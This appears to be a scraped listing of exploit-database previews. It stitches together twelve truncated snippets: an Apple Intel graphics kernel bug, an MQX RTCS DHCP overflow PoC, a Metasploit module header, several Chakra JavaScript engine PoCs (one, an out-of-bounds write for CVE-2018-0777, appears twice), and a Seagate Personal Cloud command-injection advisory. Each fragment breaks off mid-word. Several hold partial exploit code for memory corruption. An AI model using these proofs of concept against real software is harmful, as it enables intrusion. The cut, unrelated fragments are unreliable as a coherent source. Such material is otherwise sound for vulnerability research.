/* AppleIntelCapriController::getDisplayPipeCapability reads an attacker-controlled dword value from a userclient structure input buffer which it uses to index a small array of pointers to memory to copy back to userspace. There is no bounds checking
#!/usr/bin/python3 PoC for MQX RTCS code execution via DHCP options overflow. This is just a quick hack to prove the vulnerability and was designed to run on a private network with the target device. import datetime import socket def main(): Use a de
/** This software is provided by the copyright owner as is and any * expressed or implied warranties, including, but not limited to, * the implied warranties of merchantability and fitness for a particular * purpose are disclaimed. In no event shall
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::
Microsoft Edge: Chakra: JIT: Loop analysis bug CVE-2018-0777. Here's the PoC demonstrating OOB write. function opt(arr, start, end) { for (let i = start; i < end; i++) { if (i === 10) { i += 0; // -- (a) } arr[i] = 2.3023e-320; } } function main() { let ar
/* If variables don't escape the scope, the variables can be allocated to the stack. However, there are some situations, such as when a bailout happens or accessing arguments containing stack-allocated variables, where those variables should not e
/* AsmJSByteCodeGenerator::EmitCall, which is used to emit call instructions, doesn't check if an array identifier is used as callee. The method handles those invalid calls in the same way it handles valid calls such as arr[idx ...](). In these cases,
// Here's the PoC demonstrating OOB write. function opt(arr, start, end) { for (let i = start; i < end; i++) { if (i === 10) { i += 0; // -- (a) } arr[i] = 2.3023e-320; } } function main() { let arr = new Array(100); arr.fill(1.1); for (let i = 0; i < 1
/* Since the PoC is only triggerable when the DeferParse flag is enabled and requires a with statement, I think this is similar to issue 1310. PoC: */ // Enable the flag using 'n'.repeat(0x1000) eval(`(function f() { with ({}) { (function () { print(
// PoC: (function func(arg = function () { print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function. }()) { print(func); function func() { } })(); // Chakra fails to distinguish whether the functi
/* Let's start with comments in the GlobOpt::TrackIntSpecializedAddSubConstant method. // Track bounds for add or sub with a constant. For instance, consider (b = a + 2). The value of 'b' should track // that it is equal to (the value of 'a') + 2. Th
# SSD Advisory Seagate Personal Cloud Multiple Vulnerabilities ## Vulnerabilities summary The following advisory describes two (2) unauthenticated command injection vulnerabilities. Seagate Personal Cloud Home Media Storage is the easiest way to stor